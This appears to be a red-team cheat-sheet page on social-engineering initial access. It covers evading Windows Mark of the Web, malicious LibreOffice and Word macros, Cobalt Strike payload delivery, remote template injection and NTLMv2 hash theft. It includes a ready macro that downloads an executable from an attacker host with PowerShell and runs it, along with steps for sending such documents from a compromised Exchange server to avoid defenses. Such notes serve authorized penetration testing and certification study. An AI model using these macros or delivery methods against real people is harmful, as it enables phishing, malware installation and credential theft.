search
Intrusionz3r0-WriteupsHacktheboxGithubLinkedln

Social Engineering

MOTW (Mark of the Web) is a metadata tag added by Windows to files downloaded from the internet. It’s stored as an Alternate Data Stream (Zone.Identifier) and tells the OS that the file came from an untrusted source (e.g., browser download, email attachment).

For Red Teamers, MOTW matters because it can trigger security features like SmartScreen, AMSI, or macro blocking in Office. Files marked with MOTW are more likely to be flagged, blocked, or require user interaction.

To increase payload execution success, it's crucial to deliver files without MOTW. Common ways to avoid it include:

  • Using internal delivery methods (e.g., compromised Exchange, shared drives)

  • Hosting files over SMB/WebDAV

  • Packaging payloads in ZIPs without MOTW (e.g., ZIPs created locally or transferred via trusted channels)

  • Using scripts or LOLBins that write the payload to disk without MOTW

Bottom line: No MOTW = fewer defenses triggered = higher success rate.

hashtag
Macros

hashtag
Macro for Libre Office

REM  *****  BASIC  *****

Sub InitialAccess
	Shell("cmd /c powershell IWR -URI http://10.8.5.48:8081/http-vulnlabs-4444.exe -Outfile C:\Windows\Temp\http-vulnlabs-4444.exe")
	Shell("cmd /c 'C:\Windows\Temp\http-vulnlabs-4444.exe'")
End Sub

hashtag
Macro for MS Word

Loader Bypass AV/EDR: Bypass AV/EDR via DInvoke + Sliver

hashtag
Word Malicious Macro with Cobalt Strike

hashtag
Simple Macro

  1. Create a blank document

  2. View > Macros > Select document

  3. Generate a payload (Cobalt Strike Example for CRTO) RevShells.comarrow-up-right

    1. Attacks > Scripted Web Delivery (S)

      1. Set URI Path

      2. Set Host (nickelviper.com)

      3. Set Port (80)

      4. Set Listener HTTP/DNS

      5. Set type: Powershell

      6. Enable Use X64 Payload

        1. Copy the payload and set it into the macro.

  1. Save as .doc .

  2. Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.

hashtag
Remote Template injection

  1. Create a blank document

  2. View > Macros > Select document

  3. Generate a payload (Cobalt Strike Example for CRTO) RevShells.comarrow-up-right

    1. Attacks > Scripted Web Delivery (S)

      1. Set URI Path

      2. Set Host (nickelviper.com)

      3. Set Port (80)

      4. Set Listener HTTP/DNS

      5. Set type: Powershell

      6. Enable Use X64 Payload

        1. Copy the payload and set it into the macro.

  1. Save as .dot .

  2. Host the file (python server|Cobalt Striket Server)

  3. Create a new black template

    1. Save as .docx

  4. By using 1-zip click on file

    1. Go to Word > _rels > settings.xml.rels

      1. Modify the target parameter within the settings.xml.rels file with the .dot file you created before and is hosted.

  5. Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.

LogoOSCP-Cheatsheets/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros.md at master · albatux/OSCP-CheatsheetsGitHubchevron-right

hashtag
Capturing NTLMv2 Hashes

If you see you possess Write permission over public SMB share in your target domain or you see the website accepts uploading files you could use tools such as ntlm_theft to create a malicious files and steal NTLMv2 Hash

LogoGitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHubchevron-right

Some places to steal NTLMV2 Hashes

LogoPlaces of Interest in Stealing NetNTLM Hashes | 🔐Blog of Osanda🔐Blog of Osandachevron-right
PreviousMalware Development EssentialsNextPortforwarding and tunneling

Last updated